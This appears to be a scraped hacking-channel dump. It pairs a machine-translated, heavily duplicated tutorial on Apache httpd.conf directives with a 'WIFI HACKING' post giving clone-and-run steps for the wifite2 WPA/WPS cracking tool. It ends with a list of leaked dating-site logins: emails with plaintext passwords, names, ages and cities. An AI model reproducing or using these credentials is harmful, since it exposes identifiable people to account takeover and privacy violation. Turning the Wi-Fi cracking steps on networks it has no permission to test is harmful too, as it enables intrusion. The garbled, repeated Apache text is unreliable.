▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 About APACHE configuration file httpd.conf [transfer] (two)#ExtendedStatus On <br> The
> Apache server can report its own running status through special HTTP requests. Turning on this <br>
ExtendedStatus parameter allows the server to report more comprehensive running status information. <br>
Main server settings <br> The
> Apache server requires various settings to define its own use of various parameters to provide Web services. For the case of using a virtual host, in addition to the settings covered in the definition item of the virtual host (some settings must be redefined), the settings here are also the default settings of the virtual host. <br>
Port 80 <br>
🦑 About APACHE configuration file httpd.conf [transfer] (two)#ExtendedStatus On <br> The
> Apache server can report its own running status through special HTTP requests. Turning on this <br>
ExtendedStatus parameter allows the server to report more comprehensive running status information. <br>
Main server settings <br> The
> Apache server requires various settings to define its own use of various parameters to provide Web services. For the case of using a virtual host, in addition to the settings covered in the definition item of the virtual host (some settings must be redefined), the settings here are also the default settings of the virtual host. <br>
Port 80 <br>
🦑 Port defines the port used by the httpd daemon in Standalone mode. The standard port is 80. This option is only valid for the server started in independent mode. For the server started in inetd mode, define which port to use in inetd.conf. <br>
> Using port 80 under Unix requires root privileges. For security reasons, some administrators believe that the httpd server is unlikely to be free of security holes, so they are more willing to use normal user rights to start the server, so that port 80 and other If the port is less than 1024, you must use a port greater than 1024 to start httpd. Generally, 8000 or 8080 is also a commonly used port. The Apache httpd server itself can be changed to a normal user status after opening port 80 with root privileges, which reduces the risk, so there is no need to consider this security issue. But if ordinary users also want to install and configure their own WWW server, then they have to use ports larger than 1024. <br>
User nobody <br>
Group nogroup <br>
> User and Group configuration is Apache's security guarantee. After opening the port, Apache will set itself as the user and group permissions set by these two options to run, which reduces the risk of the server. This option is also only used in Standalone mode. Inetd mode specifies the user who runs Apache in inetd.conf. Since the server must perform setuid () to change the identity, the initial process should have root privileges. If a non-root user is used to start Aapche, this configuration will not work. <br> The
> default settings are nobody and nogroup. This user and group do not own files in the system, ensuring that the server itself and the CGI process started by it do not have permission to change the file system. In some cases, for example, in order to run CGI to interact with Unix, the server also needs to access the files on the server. If nobody and nogroup are still used, files belonging to nobody will appear in the system, which is detrimental to system security. Because other programs will also perform certain operations with the permissions of nobody and nogroup, it is possible to access files owned by these nobody, causing security problems. Generally, a specific user and group must be set for the Web service, and the user and group settings are changed here. <br>
> ServerAdmin you@your.address <br>
The only thing that should be changed in the configuration file is only ServerAdmin. This item is used to configure the email address of the administrator of the WWW server. This will be returned to the browser under the condition of HTTP service errors. To allow web users to contact the administrator to report errors. It is customary to use the webmaster on the server as the administrator of the WWW server, and send the email sent to the webmaster to the real web administrator through the alias mechanism of the mail server. <br>
🦑 #ServerName new.host.name <br>
By default, it is not necessary to specify the ServerName parameter, the server will automatically
obtain its name through the name resolution process, but if the server name resolution is problematic (usually reverse resolution is not <br>
correct) , Or no official DNS name, you can also specify the IP address here. When the ServerName setting
is not correct, the server cannot start normally. <br>
> Using port 80 under Unix requires root privileges. For security reasons, some administrators believe that the httpd server is unlikely to be free of security holes, so they are more willing to use normal user rights to start the server, so that port 80 and other If the port is less than 1024, you must use a port greater than 1024 to start httpd. Generally, 8000 or 8080 is also a commonly used port. The Apache httpd server itself can be changed to a normal user status after opening port 80 with root privileges, which reduces the risk, so there is no need to consider this security issue. But if ordinary users also want to install and configure their own WWW server, then they have to use ports larger than 1024. <br>
User nobody <br>
Group nogroup <br>
> User and Group configuration is Apache's security guarantee. After opening the port, Apache will set itself as the user and group permissions set by these two options to run, which reduces the risk of the server. This option is also only used in Standalone mode. Inetd mode specifies the user who runs Apache in inetd.conf. Since the server must perform setuid () to change the identity, the initial process should have root privileges. If a non-root user is used to start Aapche, this configuration will not work. <br> The
> default settings are nobody and nogroup. This user and group do not own files in the system, ensuring that the server itself and the CGI process started by it do not have permission to change the file system. In some cases, for example, in order to run CGI to interact with Unix, the server also needs to access the files on the server. If nobody and nogroup are still used, files belonging to nobody will appear in the system, which is detrimental to system security. Because other programs will also perform certain operations with the permissions of nobody and nogroup, it is possible to access files owned by these nobody, causing security problems. Generally, a specific user and group must be set for the Web service, and the user and group settings are changed here. <br>
> ServerAdmin you@your.address <br>
The only thing that should be changed in the configuration file is only ServerAdmin. This item is used to configure the email address of the administrator of the WWW server. This will be returned to the browser under the condition of HTTP service errors. To allow web users to contact the administrator to report errors. It is customary to use the webmaster on the server as the administrator of the WWW server, and send the email sent to the webmaster to the real web administrator through the alias mechanism of the mail server. <br>
🦑 #ServerName new.host.name <br>
By default, it is not necessary to specify the ServerName parameter, the server will automatically
obtain its name through the name resolution process, but if the server name resolution is problematic (usually reverse resolution is not <br>
correct) , Or no official DNS name, you can also specify the IP address here. When the ServerName setting
is not correct, the server cannot start normally. <br>
Normally a Web server can have multiple names, and the client browser can use all these names or IP addresses to access this server, but in the case of no virtual host defined, the server always responds to the browser with its own official name Device. ServerName defines the official name recognized by the Web server itself. For example, a server name (type A is defined in DNS) is exmaple.org.cn, and an alias (CNAME record) is defined as www.exmaple for the sake of memory .org.cn, then the name automatically resolved by Apache is example.org.cn, so that no matter what name the client browser uses to send the request, the server always tells the client program that it is example.org.cn. Although this generally does not cause any problems, considering that one day the server may be migrated to another computer, and only want to complete the migration task by changing the www alias configuration in DNS, so do not want customers to use Linux records in their bookmark Under the address of this server, you must use ServerName to reassign the official name of the server. <br>
DocumentRoot & quot; / www / & quot; <br>
DocumentRoot defines the storage path of the hypertext documents published by this server, and the URL requested by the client program is mapped to the web page file in this directory. Subdirectories under this directory, and use <br>
The files and directories indicated by the symbolic link can be accessed by the browser, but the same relative directory name must be used on the URL. <br>
Note that although the symbolic link is logically located under the root document directory, it can actually be located
in any directory on the computer <br> , so that client programs can access directories outside those root document directories.
While increasing flexibility but reducing security. Apache provides the FollowSymLinks option in the directory access control to turn on or off the feature that supports symbolic links. <br>
Options FollowSymLinks <br>
AllowOverride None <br> The
Apache server can perform document access control for directories, but access control can be achieved through two <br>
ways, one is in the settings file httpd.conf (or access. conf) for each
directory <br> settings, another method is to set the access control file in each directory, usually the
name of the access control file <br> . htaccess. Although both methods can be used to control browser access, the method of using the configuration file requires restarting the httpd daemon after each change, which is relatively inflexible, so it is mainly used to configure the overall security control strategy of the server system, It is more flexible and convenient to use the .htaccess file in each directory to set the access control of specific directories. <br> The
Directory statement is used to define the access restrictions of the directory. Here you can see its standard syntax to define the access restrictions for a directory. The setting in the above example is for the root directory of the system, the option to allow symbolic links FollowSymLinks is set, and the use of AllowOverride None means that access control files in this directory are not allowed to change the configuration made here, which also means that there is no need to view The corresponding access control file in this directory. <br>
DocumentRoot & quot; / www / & quot; <br>
DocumentRoot defines the storage path of the hypertext documents published by this server, and the URL requested by the client program is mapped to the web page file in this directory. Subdirectories under this directory, and use <br>
The files and directories indicated by the symbolic link can be accessed by the browser, but the same relative directory name must be used on the URL. <br>
Note that although the symbolic link is logically located under the root document directory, it can actually be located
in any directory on the computer <br> , so that client programs can access directories outside those root document directories.
While increasing flexibility but reducing security. Apache provides the FollowSymLinks option in the directory access control to turn on or off the feature that supports symbolic links. <br>
Options FollowSymLinks <br>
AllowOverride None <br> The
Apache server can perform document access control for directories, but access control can be achieved through two <br>
ways, one is in the settings file httpd.conf (or access. conf) for each
directory <br> settings, another method is to set the access control file in each directory, usually the
name of the access control file <br> . htaccess. Although both methods can be used to control browser access, the method of using the configuration file requires restarting the httpd daemon after each change, which is relatively inflexible, so it is mainly used to configure the overall security control strategy of the server system, It is more flexible and convenient to use the .htaccess file in each directory to set the access control of specific directories. <br> The
Directory statement is used to define the access restrictions of the directory. Here you can see its standard syntax to define the access restrictions for a directory. The setting in the above example is for the root directory of the system, the option to allow symbolic links FollowSymLinks is set, and the use of AllowOverride None means that access control files in this directory are not allowed to change the configuration made here, which also means that there is no need to view The corresponding access control file in this directory. <br>
The setting of the root directory will affect its subordinate directories. Note that due to the setting of AllowOverride None, the
Apache server does not need to view the access control files in the root directory, nor does it need to view the access control files in the following levels <br>
until httpd.conf (or access .conf) has specified <br>
Alloworride for a directory , that is, it allows viewing access control files. Since Apache adopts the inheritance method for directory access control, if access control files are allowed to be viewed from the root directory, then Apache must view access control files level by level, which will affect system performance. By default, this feature of the root directory is turned off, which makes Apache search downward from the directory specified in httpd.conf, reducing the number of search levels and increasing system performance. Therefore, setting AllowOverride None for the system root directory is not only helpful to system security, but also beneficial to system performance. <br>
Options Indexes FollowSymLinks <br>
AllowOverride None <br>
Order allow, deny <br>
Allow from all <br>
Apache server does not need to view the access control files in the root directory, nor does it need to view the access control files in the following levels <br>
until httpd.conf (or access .conf) has specified <br>
Alloworride for a directory , that is, it allows viewing access control files. Since Apache adopts the inheritance method for directory access control, if access control files are allowed to be viewed from the root directory, then Apache must view access control files level by level, which will affect system performance. By default, this feature of the root directory is turned off, which makes Apache search downward from the directory specified in httpd.conf, reducing the number of search levels and increasing system performance. Therefore, setting AllowOverride None for the system root directory is not only helpful to system security, but also beneficial to system performance. <br>
Options Indexes FollowSymLinks <br>
AllowOverride None <br>
Order allow, deny <br>
Allow from all <br>
🦑 The definition here is the access settings for the directory where the system publishes documents. Set different AllowOverride options to define the configuration The relationship between the directory settings in the file and the security control files in the user directory, and the Options option is used to define the characteristics of the directory. <br> The
🦑 configuration file and the access control file in each directory can set access restrictions. The setting file is set by the
administrator, and the access control file in each directory is set by the owner of the directory. So manage <br>
You can specify whether the owner of the directory can override the system settings in the settings file. This requires setting using the AllowOverride parameter. The values that can usually be set are: <br>
AllowOverride settings for each directory access control file Affects the <br>
All default value, so that the access control file can override the system configuration. <br>
None The server ignores the setting of the access control file. <br>
Options Allows options in the access control file to define the directory using the Options parameter. <br>
FileInfo allows You can use AddType and other parameter settings in the access control file. <br>
AuthConfig allows the access control file to use AuthName, AuthType, and other authentication mechanisms for each user. This allows the owner of the directory to protect the directory with a password and username. Limit allows access to the directory IP addresses and names of clients are restricted. <br>
Each directory has certain attributes. You can use Options to control some access feature settings under this directory. The following are commonly used feature options: <br>
Options Set Server Feature Settings < br>
All all directory features are valid, this is the default state <br>
None All directory features are invalid <br>
FollowSymLinks allows the use of symbolic links, which will make it possible for browsers to access documents outside the document root directory (DocumentRoot) To allow access, this setting will add some security <br>
ExecCGI allows CGI programs to be executed in this directory Indexes Allows the browser to generate an index of all files in this directory, so that when there is no index.html (or other index files) in this directory, files in this directory can be sent to the browser List <br>
In addition, the above example also uses Order, Allow, Deny and other parameters, which is a way to control access based on the browser domain name and IP address in the Limit statement. Order defines the order of processing Allow and Deny, while Allow and Deny set access control settings for names or IPs. The above example uses allowfrom all to indicate that all clients are allowed to access this directory without any restrictions. <br>
UserDir public_html <br>
When running an Apache server on a Linux, all users on this computer can have their own web page path, like http://example.org.cn/~user, use The tilde plus the user name can be mapped to the user's own web directory. The mapping directory is a subdirectory under the user's personal home directory, and its name is defined by the UseDir parameter, which defaults to public_html. If you do not want to provide web services for formal users, use DISABLED as the parameter of UserDir. <br>
# <br>
# AllowOverride FileInfo AuthConfig Limit <br>
# Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec <br>
# <br>
# Order allow, deny <br>
# Allow from all <br>
🦑 configuration file and the access control file in each directory can set access restrictions. The setting file is set by the
administrator, and the access control file in each directory is set by the owner of the directory. So manage <br>
You can specify whether the owner of the directory can override the system settings in the settings file. This requires setting using the AllowOverride parameter. The values that can usually be set are: <br>
AllowOverride settings for each directory access control file Affects the <br>
All default value, so that the access control file can override the system configuration. <br>
None The server ignores the setting of the access control file. <br>
Options Allows options in the access control file to define the directory using the Options parameter. <br>
FileInfo allows You can use AddType and other parameter settings in the access control file. <br>
AuthConfig allows the access control file to use AuthName, AuthType, and other authentication mechanisms for each user. This allows the owner of the directory to protect the directory with a password and username. Limit allows access to the directory IP addresses and names of clients are restricted. <br>
Each directory has certain attributes. You can use Options to control some access feature settings under this directory. The following are commonly used feature options: <br>
Options Set Server Feature Settings < br>
All all directory features are valid, this is the default state <br>
None All directory features are invalid <br>
FollowSymLinks allows the use of symbolic links, which will make it possible for browsers to access documents outside the document root directory (DocumentRoot) To allow access, this setting will add some security <br>
ExecCGI allows CGI programs to be executed in this directory Indexes Allows the browser to generate an index of all files in this directory, so that when there is no index.html (or other index files) in this directory, files in this directory can be sent to the browser List <br>
In addition, the above example also uses Order, Allow, Deny and other parameters, which is a way to control access based on the browser domain name and IP address in the Limit statement. Order defines the order of processing Allow and Deny, while Allow and Deny set access control settings for names or IPs. The above example uses allowfrom all to indicate that all clients are allowed to access this directory without any restrictions. <br>
UserDir public_html <br>
When running an Apache server on a Linux, all users on this computer can have their own web page path, like http://example.org.cn/~user, use The tilde plus the user name can be mapped to the user's own web directory. The mapping directory is a subdirectory under the user's personal home directory, and its name is defined by the UseDir parameter, which defaults to public_html. If you do not want to provide web services for formal users, use DISABLED as the parameter of UserDir. <br>
# <br>
# AllowOverride FileInfo AuthConfig Limit <br>
# Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec <br>
# <br>
# Order allow, deny <br>
# Allow from all <br>
# <br>
# Order deny, allow <br>
# Deny from all <br>
# <br>
# <br>
Here you can see another usage of Directory, that is, you can use a simple pattern matching method to target different distributions. Sub-directories under the directory define access control permissions. This setting requires the Apache server to perform additional processing on each path, which will reduce the performance of the server, so this access restriction is not turned on by default. <br>
You can see another statement Limit here. The Limit statement is used to set access control for specific request methods. Among them, you can use the request methods supported by various servers such as GET and POST to set Limit parameters to set Limit access to different request methods. Generally, you can open the three request methods for GET, POST, and HEAD, and block other request methods to increase security. In the Limit statement, you can use Order, Allow, Deny, Allow and Deny can use the matching method to limit the domain name and IP, but the domain name is matched from front to back, and the IP address is matched from front to back. <br>
DirectoryIndex index.html <br>
In many cases, the URL does not specify the name of the document, but only gives a directory name. Then the Apache server will automatically return the files defined by DirectoryIndex in this directory. Of course, you can specify multiple file names, and the system will search sequentially in this directory. When all the files specified by DirectoryIndex do not exist, the Apache server can generate a list of all files in this directory according to the system settings to provide users with options. At this time, the Indexes option (Options Indexes) in the access control options of the directory must be turned on to enable the server to generate a directory list, otherwise Apache will deny access. <br>
AccessFileName .htaccess <br>
> AccessFileName defines the file name of the access control file in each directory. The default is .htaccess. You can change the access control restrictions of different directories by changing this file. <br>
Order allow, deny <br>
Deny from all <br>
> In addition to access control for directories, you can also set access control based on files, which
is the task of File statements. Using the File statement, no matter which directory the file is in, as long as the name matches, you must accept the corresponding access control. This statement is more important for system security. For example, the above example will block all users from accessing the .htaccess file, so as to prevent the key security information in .htaccess from being obtained by customers. <br>
#chmod acheNegotiatedDocs <br> By
default, if the proxy server and the Apache server negotiate whether to cache their web pages, Apache gives a
negative answer to <br> and does not want their web pages to be cached by the proxy server. However, this can not effectively use the advantages of the proxy server, so you can set the CacheNegotiatieDocs option, so that the proxy server can cache web pages. However, even if this option is not set, some proxy servers (or by adjusting the settings) can also cache web pages. <br>
UseCanonicalName On <br>
Turning on UseCanonicalName is a standard practice for Web servers, because most of the requests sent by customers are references to this server, so that the server can use the settings of ServerName and Port options to build a complete URL and respond to the customer so that the browser can Canonical URL. If this parameter is set to Off, Apache will use the server name and port value obtained from the client request (the client supporting HTTP 1.1 will have this information) and rebuild the URL. <br>
TypesConfig /usr/local/apache/etc/mime.types <br>
TypeConfig is used to set the file name that holds different MIME type data, the default setting under Linux is / usr / local / apache / etc / mime.types. <br>
DefaultType text / plain <br>
# Order deny, allow <br>
# Deny from all <br>
# <br>
# <br>
Here you can see another usage of Directory, that is, you can use a simple pattern matching method to target different distributions. Sub-directories under the directory define access control permissions. This setting requires the Apache server to perform additional processing on each path, which will reduce the performance of the server, so this access restriction is not turned on by default. <br>
You can see another statement Limit here. The Limit statement is used to set access control for specific request methods. Among them, you can use the request methods supported by various servers such as GET and POST to set Limit parameters to set Limit access to different request methods. Generally, you can open the three request methods for GET, POST, and HEAD, and block other request methods to increase security. In the Limit statement, you can use Order, Allow, Deny, Allow and Deny can use the matching method to limit the domain name and IP, but the domain name is matched from front to back, and the IP address is matched from front to back. <br>
DirectoryIndex index.html <br>
In many cases, the URL does not specify the name of the document, but only gives a directory name. Then the Apache server will automatically return the files defined by DirectoryIndex in this directory. Of course, you can specify multiple file names, and the system will search sequentially in this directory. When all the files specified by DirectoryIndex do not exist, the Apache server can generate a list of all files in this directory according to the system settings to provide users with options. At this time, the Indexes option (Options Indexes) in the access control options of the directory must be turned on to enable the server to generate a directory list, otherwise Apache will deny access. <br>
AccessFileName .htaccess <br>
> AccessFileName defines the file name of the access control file in each directory. The default is .htaccess. You can change the access control restrictions of different directories by changing this file. <br>
Order allow, deny <br>
Deny from all <br>
> In addition to access control for directories, you can also set access control based on files, which
is the task of File statements. Using the File statement, no matter which directory the file is in, as long as the name matches, you must accept the corresponding access control. This statement is more important for system security. For example, the above example will block all users from accessing the .htaccess file, so as to prevent the key security information in .htaccess from being obtained by customers. <br>
#chmod acheNegotiatedDocs <br> By
default, if the proxy server and the Apache server negotiate whether to cache their web pages, Apache gives a
negative answer to <br> and does not want their web pages to be cached by the proxy server. However, this can not effectively use the advantages of the proxy server, so you can set the CacheNegotiatieDocs option, so that the proxy server can cache web pages. However, even if this option is not set, some proxy servers (or by adjusting the settings) can also cache web pages. <br>
UseCanonicalName On <br>
Turning on UseCanonicalName is a standard practice for Web servers, because most of the requests sent by customers are references to this server, so that the server can use the settings of ServerName and Port options to build a complete URL and respond to the customer so that the browser can Canonical URL. If this parameter is set to Off, Apache will use the server name and port value obtained from the client request (the client supporting HTTP 1.1 will have this information) and rebuild the URL. <br>
TypesConfig /usr/local/apache/etc/mime.types <br>
TypeConfig is used to set the file name that holds different MIME type data, the default setting under Linux is / usr / local / apache / etc / mime.types. <br>
DefaultType text / plain <br>
If the Web server cannot determine the default type of a document, which usually means that the document uses a non-standard suffix, then the server uses the MIME type defined by DefaultType to send the document to the client browser. The setting here is text / plain. The problem with this setting is that if the server cannot determine the MIME of the document, then in most cases this document is a binary document, but sent back in text / plain format, the browser will open internally It will not prompt to save. Therefore it is recommended to change this setting to <br>
application / octet-stream so that the browser will prompt the user to save. <br>
MIMEMagicFile / usr / local / apache / etc / magic <br>
In addition to judging the MIME type of the file from the suffix of the file, Apache can be further divided <br>
Analyze some characteristics of the file to determine the true MIME type of the file. This function is implemented by the mod_mime_magic module, which requires a file that records the characteristics of various MIME types for analysis and judgment. The above setting is a conditional statement. If you load this module, you must specify the location of the corresponding logo file magic. <br> When
connecting, the server can only get the client's IP address. If you want to get the client's <br>
host name for logging and providing to the CGI program, you need to use this HostnameLookups option Set to On to turn on the DNS anti-check function. However, this will cause the server to perform DNS queries for each client request, increasing system overhead and making the response slower, so the default setting is to use Off to turn off this option. After turning off the option, the server will not obtain the client's host name, but only use the IP address to record the client. <br>
ErrorLog /var/log/httpd-error.log <br>
LogLevel warn <br>
LogFormat & quot;% h% l% u% t & quot;% r & quot;% & gt; s% b & quot;% {Referer} i & quot; & quot;% {User-Agent} & quot; & quot; combined <br>
LogFormat & quot;% h% l% u% t & quot;% r & quot;% & gt; s% b & quot; common <br>
LogFormat & quot;% { Referer} i-& gt;% U & quot; referer <br>
#CustomLog /var/log/httpd-access.log common <br>
#CustomLog /var/log/httpd-referer.log referer <br>
#CustomLog /var/log/httpd-agent.log agent <br>
CustomLog / var / log / httpd-access.log combined <br>
This defines the form of the system log. For server error logging, ErrorLog and LogLevel define different error log files and their recording content. <br>
For system access logs, the CustomLog parameter is used to define the log location by default, and the combined parameter is used by default to specify that all access logs are placed in a file, however, different types of access logs can also be placed in different logs In the log file, this is done by specifying different record types in CustomLog. common indicates the common request access record for a single page, referer indicates the reference record of each page, you can see the number of requests contained in a page, and agent indicates the type record of the client, obviously you can set the existing combined definition Comment out the line, and use common, referer, and agent as parameters of CustomLog to specify log files for different types of logs. <br>
Obviously, LogFormat is used to define the format used when different types of logs are recorded. Here <br>
uses a macro definition starting with% to record different contents. <br>
If the file specified by these parameters uses a relative path, then it is a path relative to ServerRoot
. <br>
application / octet-stream so that the browser will prompt the user to save. <br>
MIMEMagicFile / usr / local / apache / etc / magic <br>
In addition to judging the MIME type of the file from the suffix of the file, Apache can be further divided <br>
Analyze some characteristics of the file to determine the true MIME type of the file. This function is implemented by the mod_mime_magic module, which requires a file that records the characteristics of various MIME types for analysis and judgment. The above setting is a conditional statement. If you load this module, you must specify the location of the corresponding logo file magic. <br> When
connecting, the server can only get the client's IP address. If you want to get the client's <br>
host name for logging and providing to the CGI program, you need to use this HostnameLookups option Set to On to turn on the DNS anti-check function. However, this will cause the server to perform DNS queries for each client request, increasing system overhead and making the response slower, so the default setting is to use Off to turn off this option. After turning off the option, the server will not obtain the client's host name, but only use the IP address to record the client. <br>
ErrorLog /var/log/httpd-error.log <br>
LogLevel warn <br>
LogFormat & quot;% h% l% u% t & quot;% r & quot;% & gt; s% b & quot;% {Referer} i & quot; & quot;% {User-Agent} & quot; & quot; combined <br>
LogFormat & quot;% h% l% u% t & quot;% r & quot;% & gt; s% b & quot; common <br>
LogFormat & quot;% { Referer} i-& gt;% U & quot; referer <br>
#CustomLog /var/log/httpd-access.log common <br>
#CustomLog /var/log/httpd-referer.log referer <br>
#CustomLog /var/log/httpd-agent.log agent <br>
CustomLog / var / log / httpd-access.log combined <br>
This defines the form of the system log. For server error logging, ErrorLog and LogLevel define different error log files and their recording content. <br>
For system access logs, the CustomLog parameter is used to define the log location by default, and the combined parameter is used by default to specify that all access logs are placed in a file, however, different types of access logs can also be placed in different logs In the log file, this is done by specifying different record types in CustomLog. common indicates the common request access record for a single page, referer indicates the reference record of each page, you can see the number of requests contained in a page, and agent indicates the type record of the client, obviously you can set the existing combined definition Comment out the line, and use common, referer, and agent as parameters of CustomLog to specify log files for different types of logs. <br>
Obviously, LogFormat is used to define the format used when different types of logs are recorded. Here <br>
uses a macro definition starting with% to record different contents. <br>
If the file specified by these parameters uses a relative path, then it is a path relative to ServerRoot
. <br>
In some cases, for example, when the webpage requested by the client does not exist, the server will generate an error document. <br> By
default, because the ServerSignature option is turned on, the last line of the error document will contain the server name, Apache version and other information . Some administrators prefer not to display this information externally, so you
can set this parameter to Off or set it to Email, and the last line will be replaced by the Email prompt for ServerAdmin. <br>
Alias / icons / & quot; / www / icons / & quot; <br>
Options Indexes MultiViews <br>
AllowOverride None <br>
Order allow, deny <br>
Allow from all <br>
Alias parameters are used to link URLs with The real location in the server's file system is directly mapped, and the general <br>
documents will be queried in DocumentRoot, however, the path defined by Alias will be directly mapped to the
corresponding directory, instead of querying under DocumentRoot . Therefore, Alias can be used to map
the path of some <br> public files, such as the icons path where various common icons are saved. In this way, in addition to using symbolic links, directories other than the document root (DocumentRoot) can also be provided to the browser by using the Alias mapping. <br> After
defining the mapped path, you should use the Directory statement to set the access restrictions. <br>
AllowOverride None <br>
Options None <br>
Order allow, deny <br>
Allow from all <br>
ScriptAlias is also used for URL path mapping, but the difference with Alias is that ScriptAlias is used to map the path of CGI programs, this The files under the path are defined as CGI programs, and the results are obtained by executing them, rather than the server directly returning its contents. By default, CGI programs use the cgi-bin directory as a virtual path. <br>
# Redirect old-URI new-URL <br> The
Redirect parameter is used to rewrite the URL. When the browser accesses a resource that no longer exists on the server, the server returns the new URL to the browser, telling The browser obtains resources from the URL. This is mainly used for documents that originally existed on the server and changed the location.
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
default, because the ServerSignature option is turned on, the last line of the error document will contain the server name, Apache version and other information . Some administrators prefer not to display this information externally, so you
can set this parameter to Off or set it to Email, and the last line will be replaced by the Email prompt for ServerAdmin. <br>
Alias / icons / & quot; / www / icons / & quot; <br>
Options Indexes MultiViews <br>
AllowOverride None <br>
Order allow, deny <br>
Allow from all <br>
Alias parameters are used to link URLs with The real location in the server's file system is directly mapped, and the general <br>
documents will be queried in DocumentRoot, however, the path defined by Alias will be directly mapped to the
corresponding directory, instead of querying under DocumentRoot . Therefore, Alias can be used to map
the path of some <br> public files, such as the icons path where various common icons are saved. In this way, in addition to using symbolic links, directories other than the document root (DocumentRoot) can also be provided to the browser by using the Alias mapping. <br> After
defining the mapped path, you should use the Directory statement to set the access restrictions. <br>
AllowOverride None <br>
Options None <br>
Order allow, deny <br>
Allow from all <br>
ScriptAlias is also used for URL path mapping, but the difference with Alias is that ScriptAlias is used to map the path of CGI programs, this The files under the path are defined as CGI programs, and the results are obtained by executing them, rather than the server directly returning its contents. By default, CGI programs use the cgi-bin directory as a virtual path. <br>
# Redirect old-URI new-URL <br> The
Redirect parameter is used to rewrite the URL. When the browser accesses a resource that no longer exists on the server, the server returns the new URL to the browser, telling The browser obtains resources from the URL. This is mainly used for documents that originally existed on the server and changed the location.
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑WIFI HACKING TERMIX-LINUX :
instagram.com/undercodeTesting
1) git clone https://github.com/derv82/wifite2.git
2) cd wifite2
3) sudo ./Wifite.py
🦑FEATURES :
PMKID hash capture (enabled by-default, force with: --pmkid)
WPS Offline Brute-Force Attack aka "Pixie-Dust". (enabled by-default, force with: --wps-only --pixie)
WPS Online Brute-Force Attack aka "PIN attack". (enabled by-default, force with: --wps-only --no-pixie)
WPA/2 Offline Brute-Force Attack via 4-Way Handshake capture (enabled by-default, force with: --no-wps)
Validates handshakes against pyrit, tshark, cowpatty, and aircrack-ng (when available)
Various WEP attacks (replay, chopchop, fragment, hirte, p0841, caffe-latte)
Automatically decloaks hidden access points while scanning or attacking.
Note: Only works when channel is fixed. Use -c <channel>
Disable this using --no-deauths
5Ghz support for some wireless cards (via -5 switch).
Note: Some tools don't play well on 5GHz channels (e.g. aireplay-ng)
Stores cracked passwords and handshakes to the current directory (--cracked)
Includes information about the cracked access point (Name, BSSID, Date, etc).
Easy to try to crack handshakes or PMKID hashes against a wordlist (--crack)
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑WIFI HACKING TERMIX-LINUX :
instagram.com/undercodeTesting
1) git clone https://github.com/derv82/wifite2.git
2) cd wifite2
3) sudo ./Wifite.py
🦑FEATURES :
PMKID hash capture (enabled by-default, force with: --pmkid)
WPS Offline Brute-Force Attack aka "Pixie-Dust". (enabled by-default, force with: --wps-only --pixie)
WPS Online Brute-Force Attack aka "PIN attack". (enabled by-default, force with: --wps-only --no-pixie)
WPA/2 Offline Brute-Force Attack via 4-Way Handshake capture (enabled by-default, force with: --no-wps)
Validates handshakes against pyrit, tshark, cowpatty, and aircrack-ng (when available)
Various WEP attacks (replay, chopchop, fragment, hirte, p0841, caffe-latte)
Automatically decloaks hidden access points while scanning or attacking.
Note: Only works when channel is fixed. Use -c <channel>
Disable this using --no-deauths
5Ghz support for some wireless cards (via -5 switch).
Note: Some tools don't play well on 5GHz channels (e.g. aireplay-ng)
Stores cracked passwords and handshakes to the current directory (--cracked)
Includes information about the cracked access point (Name, BSSID, Date, etc).
Easy to try to crack handshakes or PMKID hashes against a wordlist (--crack)
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
GitHub
GitHub - derv82/wifite2: Rewrite of the popular wireless network auditor, "wifite"
Rewrite of the popular wireless network auditor, "wifite" - derv82/wifite2
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑LEVO (DATING) & Chats FREE PREMIUM ACCOUNts VERFIED XD :
alextreize@live.fr:treizejuin | Name = alex82 | Gender = male | Age = 36 | Credits = 55 | VIP = 0 | City = Verdun-sur-Garonne | Country = FR |
barwita89@live.fr (barwita89@live.fr):220174 | Name = Karim | Gender = male | Age = 42 | Credits = 97 | VIP = 0 | City = Bruxelles | Country = BE |
beufa1@live.fr:etimrehl | : Name = fabien | Gender = male | Age = 41 | Credits = 20 | VIP = 0 | City = Caen | Country = FR |
raikon7g7@yahoo.fr:50 (raikon7g7@yahoo.fr:50)cent | Name = David geneva | Gender = male | Age = 30 | Credits = 105 | VIP = 0 | City = Genève | Country = CH |
antonio.cerdeira@free.fr:catherine | : Name = grosse92 | Gender = male | Age = 43 | Credits = 10 | VIP = 0 | City = Paris | Country = FR |
barbier_77@live.fr:alasco24 | : Name = Kéré | Gender = male | Age = 26 | Credits = 229 | VIP = 0 | Cit
alicesurgand42@outlook.fr (alicesurgand42@outlook.fr):05272481 | Name = durand2014 | Gender = male | Age = 23 | Credits = 75 | VIP = 1 | City = St Albans | Country = GB |
bada-.-boom@live.fr:EXIL95zik | Name = Ronan | Gender = male | Age = 33 | Credits = 20 | VIP = 0 | City = Nantes | Country = FR |
bastou24@aliceadsl.fr:bougnat24 |Name = seb | Gender = male | Age = 42 | Credits = 8 | VIP = 0 | City = Sarlat-la-Canéda | Country = FR |
alexioo@live.fr (alexioo@live.fr):123321aa Name = allexx | Gender = male | Age = 32 | Credits = 65 | VIP = 0 | City = Gaillard | Country = FR |
rem64@live.fr:destroy360 | Name = Rem Farga | Gender = male | Age = 29 | Credits = 25 | VIP = 0 | City = Bayonne | Country = FR |
antoine.fournier59@orange.fr:473 (antoine.fournier59@orange.fr:473)cxn59 | Name = Antoine | Gender = male | Age = 34 | Credits = 0 | VIP = 0 | City = Valenciennes | Country = FR |
sebastien.boncino@wanadoo.fr:musculation | : Name = Sebastien | Gender = male | Age = 42 | Credits = 18 | VIP = 0 | City = Aubagne | Country = FR |
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
